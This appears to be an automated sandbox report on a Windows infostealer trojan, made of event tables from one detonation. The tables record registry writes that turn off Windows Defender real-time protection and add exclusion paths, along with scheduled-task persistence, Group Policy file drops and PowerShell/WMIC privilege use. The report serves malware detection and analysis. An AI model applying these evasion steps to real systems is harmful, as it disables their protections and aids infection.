Malware Analysis Report

2024-11-15 06:11

Sample ID 240407-3qvkdaaa9v
Target 99ec5388d313fa009657ce8b619b203f62053c5602d639364f05f978cb980dd1
SHA256 99ec5388d313fa009657ce8b619b203f62053c5602d639364f05f978cb980dd1
Tags
evasion spyware stealer trojan discovery
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

99ec5388d313fa009657ce8b619b203f62053c5602d639364f05f978cb980dd1

Threat Level: Known bad

The file 99ec5388d313fa009657ce8b619b203f62053c5602d639364f05f978cb980dd1 was found to be: Known bad.

Malicious Activity Summary

evasion spyware stealer trojan discovery

Windows security bypass

Modifies Windows Defender Real-time Protection settings

Blocklisted process makes network request

Loads dropped DLL

Checks BIOS information in registry

Executes dropped EXE

Reads user/profile data of web browsers

Checks computer location settings

Checks installed software on the system

Drops desktop.ini file(s)

Drops Chrome extension

Drops file in System32 directory

Drops file in Program Files directory

Drops file in Windows directory

Enumerates physical storage devices

Unsigned PE

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Modifies data under HKEY_USERS

Enumerates system info in registry

Suspicious use of WriteProcessMemory

Creates scheduled task(s)

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-04-07 23:43

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-04-07 23:43

Reported

2024-04-07 23:46

Platform

win7-20240221-en

Max time kernel

150s

Max time network

147s

Command Line

"C:\Users\Admin\AppData\Local\Temp\99ec5388d313fa009657ce8b619b203f62053c5602d639364f05f978cb980dd1.exe"

Signatures

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection C:\Windows\SysWOW64\reg.exe N/A

Windows security bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\atUnoJEcU = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\hdPjkOXNzukcsjVB = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\HbtuuClNkkkdGbCN = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\AhrcuswkDyIWnALCLrR = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\IzgzDpAcykvAyjOga = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\HbtuuClNkkkdGbCN = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\bHChqWbaifmeC = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\HbtuuClNkkkdGbCN = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\HbtuuClNkkkdGbCN = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\OiJitsNRDAtU2 = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\bHChqWbaifmeC = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\hdPjkOXNzukcsjVB = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\OiJitsNRDAtU2 = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\tYlulnlhfvUn = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\tYlulnlhfvUn = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\IzgzDpAcykvAyjOga = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\AhrcuswkDyIWnALCLrR = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\atUnoJEcU = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\7zS4D07.tmp\Install.exe N/A

Reads user/profile data of web browsers

spyware stealer

Drops file in System32 directory

Description Indicator Process Target
File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\AppData\Local\Temp\IzgzDpAcykvAyjOga\SsZBMntoSujlFmS\ZZfpWKo.exe N/A
File created C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\IzgzDpAcykvAyjOga\SsZBMntoSujlFmS\ZZfpWKo.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\AppData\Local\Temp\IzgzDpAcykvAyjOga\SsZBMntoSujlFmS\ZZfpWKo.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\IzgzDpAcykvAyjOga\SsZBMntoSujlFmS\ZZfpWKo.exe N/A
File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\bjzvzwrptCEFdBfgJx.job C:\Windows\SysWOW64\schtasks.exe N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Users\Admin\AppData\Local\Temp\7zS4D07.tmp\Install.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Local\Temp\7zS4D07.tmp\Install.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached C:\Users\Admin\AppData\Local\Temp\IzgzDpAcykvAyjOga\SsZBMntoSujlFmS\ZZfpWKo.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\SysWOW64\wscript.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" C:\Windows\SysWOW64\wscript.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{6C467336-8281-4E60-8204-430CED96822D} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 0100000000000000f0b31eba4589da01 C:\Users\Admin\AppData\Local\Temp\IzgzDpAcykvAyjOga\SsZBMntoSujlFmS\ZZfpWKo.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Users\Admin\AppData\Local\Temp\IzgzDpAcykvAyjOga\SsZBMntoSujlFmS\ZZfpWKo.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = f0df6aba4589da01 C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software C:\Windows\SysWOW64\wscript.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\SysWOW64\wscript.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" C:\Windows\SysWOW64\wscript.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" C:\Users\Admin\AppData\Local\Temp\IzgzDpAcykvAyjOga\SsZBMntoSujlFmS\ZZfpWKo.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft C:\Windows\SysWOW64\wscript.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host C:\Windows\SysWOW64\wscript.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" C:\Users\Admin\AppData\Local\Temp\IzgzDpAcykvAyjOga\SsZBMntoSujlFmS\ZZfpWKo.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings C:\Windows\SysWOW64\wscript.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host\Settings C:\Windows\SysWOW64\wscript.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2036 wrote to memory of 2620 N/A C:\Users\Admin\AppData\Local\Temp\99ec5388d313fa009657ce8b619b203f62053c5602d639364f05f978cb980dd1.exe C:\Users\Admin\AppData\Local\Temp\7zS4D07.tmp\Install.exe
PID 2036 wrote to memory of 2620 N/A C:\Users\Admin\AppData\Local\Temp\99ec5388d313fa009657ce8b619b203f62053c5602d639364f05f978cb980dd1.exe C:\Users\Admin\AppData\Local\Temp\7zS4D07.tmp\Install.exe
PID 2036 wrote to memory of 2620 N/A C:\Users\Admin\AppData\Local\Temp\99ec5388d313fa009657ce8b619b203f62053c5602d639364f05f978cb980dd1.exe C:\Users\Admin\AppData\Local\Temp\7zS4D07.tmp\Install.exe
PID 2036 wrote to memory of 2620 N/A C:\Users\Admin\AppData\Local\Temp\99ec5388d313fa009657ce8b619b203f62053c5602d639364f05f978cb980dd1.exe C:\Users\Admin\AppData\Local\Temp\7zS4D07.tmp\Install.exe
PID 2036 wrote to memory of 2620 N/A C:\Users\Admin\AppData\Local\Temp\99ec5388d313fa009657ce8b619b203f62053c5602d639364f05f978cb980dd1.exe C:\Users\Admin\AppData\Local\Temp\7zS4D07.tmp\Install.exe
PID 2036 wrote to memory of 2620 N/A C:\Users\Admin\AppData\Local\Temp\99ec5388d313fa009657ce8b619b203f62053c5602d639364f05f978cb980dd1.exe C:\Users\Admin\AppData\Local\Temp\7zS4D07.tmp\Install.exe
PID 2036 wrote to memory of 2620 N/A C:\Users\Admin\AppData\Local\Temp\99ec5388d313fa009657ce8b619b203f62053c5602d639364f05f978cb980dd1.exe C:\Users\Admin\AppData\Local\Temp\7zS4D07.tmp\Install.exe
PID 2620 wrote to memory of 2396 N/A C:\Users\Admin\AppData\Local\Temp\7zS4D07.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 2620 wrote to memory of 2396 N/A C:\Users\Admin\AppData\Local\Temp\7zS4D07.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 2620 wrote to memory of 2396 N/A C:\Users\Admin\AppData\Local\Temp\7zS4D07.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 2620 wrote to memory of 2396 N/A C:\Users\Admin\AppData\Local\Temp\7zS4D07.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 2620 wrote to memory of 2396 N/A C:\Users\Admin\AppData\Local\Temp\7zS4D07.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 2620 wrote to memory of 2396 N/A C:\Users\Admin\AppData\Local\Temp\7zS4D07.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 2620 wrote to memory of 2396 N/A C:\Users\Admin\AppData\Local\Temp\7zS4D07.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 2396 wrote to memory of 2360 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2396 wrote to memory of 2360 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2396 wrote to memory of 2360 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2396 wrote to memory of 2360 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2396 wrote to memory of 2360 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2396 wrote to memory of 2360 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2396 wrote to memory of 2360 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2360 wrote to memory of 2368 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2360 wrote to memory of 2368 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2360 wrote to memory of 2368 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2360 wrote to memory of 2368 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2360 wrote to memory of 2368 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2360 wrote to memory of 2368 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2360 wrote to memory of 2368 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2620 wrote to memory of 1940 N/A C:\Users\Admin\AppData\Local\Temp\7zS4D07.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 2620 wrote to memory of 1940 N/A C:\Users\Admin\AppData\Local\Temp\7zS4D07.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 2620 wrote to memory of 1940 N/A C:\Users\Admin\AppData\Local\Temp\7zS4D07.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 2620 wrote to memory of 1940 N/A C:\Users\Admin\AppData\Local\Temp\7zS4D07.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 2620 wrote to memory of 1940 N/A C:\Users\Admin\AppData\Local\Temp\7zS4D07.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 2620 wrote to memory of 1940 N/A C:\Users\Admin\AppData\Local\Temp\7zS4D07.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 2620 wrote to memory of 1940 N/A C:\Users\Admin\AppData\Local\Temp\7zS4D07.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 2368 wrote to memory of 548 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 2368 wrote to memory of 548 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 2368 wrote to memory of 548 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 2368 wrote to memory of 548 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 2368 wrote to memory of 548 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 2368 wrote to memory of 548 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 2368 wrote to memory of 548 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 1608 wrote to memory of 1544 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Local\Temp\IzgzDpAcykvAyjOga\SsZBMntoSujlFmS\ZZfpWKo.exe
PID 1608 wrote to memory of 1544 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Local\Temp\IzgzDpAcykvAyjOga\SsZBMntoSujlFmS\ZZfpWKo.exe
PID 1608 wrote to memory of 1544 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Local\Temp\IzgzDpAcykvAyjOga\SsZBMntoSujlFmS\ZZfpWKo.exe
PID 1608 wrote to memory of 1544 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Local\Temp\IzgzDpAcykvAyjOga\SsZBMntoSujlFmS\ZZfpWKo.exe
PID 1544 wrote to memory of 1128 N/A C:\Users\Admin\AppData\Local\Temp\IzgzDpAcykvAyjOga\SsZBMntoSujlFmS\ZZfpWKo.exe C:\Windows\SysWOW64\schtasks.exe
PID 1544 wrote to memory of 1128 N/A C:\Users\Admin\AppData\Local\Temp\IzgzDpAcykvAyjOga\SsZBMntoSujlFmS\ZZfpWKo.exe C:\Windows\SysWOW64\schtasks.exe
PID 1544 wrote to memory of 1128 N/A C:\Users\Admin\AppData\Local\Temp\IzgzDpAcykvAyjOga\SsZBMntoSujlFmS\ZZfpWKo.exe C:\Windows\SysWOW64\schtasks.exe
PID 1544 wrote to memory of 1128 N/A C:\Users\Admin\AppData\Local\Temp\IzgzDpAcykvAyjOga\SsZBMntoSujlFmS\ZZfpWKo.exe C:\Windows\SysWOW64\schtasks.exe
PID 1544 wrote to memory of 2872 N/A C:\Users\Admin\AppData\Local\Temp\IzgzDpAcykvAyjOga\SsZBMntoSujlFmS\ZZfpWKo.exe C:\Windows\SysWOW64\schtasks.exe
PID 1544 wrote to memory of 2872 N/A C:\Users\Admin\AppData\Local\Temp\IzgzDpAcykvAyjOga\SsZBMntoSujlFmS\ZZfpWKo.exe C:\Windows\SysWOW64\schtasks.exe
PID 1544 wrote to memory of 2872 N/A C:\Users\Admin\AppData\Local\Temp\IzgzDpAcykvAyjOga\SsZBMntoSujlFmS\ZZfpWKo.exe C:\Windows\SysWOW64\schtasks.exe
PID 1544 wrote to memory of 2872 N/A C:\Users\Admin\AppData\Local\Temp\IzgzDpAcykvAyjOga\SsZBMntoSujlFmS\ZZfpWKo.exe C:\Windows\SysWOW64\schtasks.exe
PID 2796 wrote to memory of 2256 N/A C:\Windows\system32\taskeng.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
PID 2796 wrote to memory of 2256 N/A C:\Windows\system32\taskeng.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
PID 2796 wrote to memory of 2256 N/A C:\Windows\system32\taskeng.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
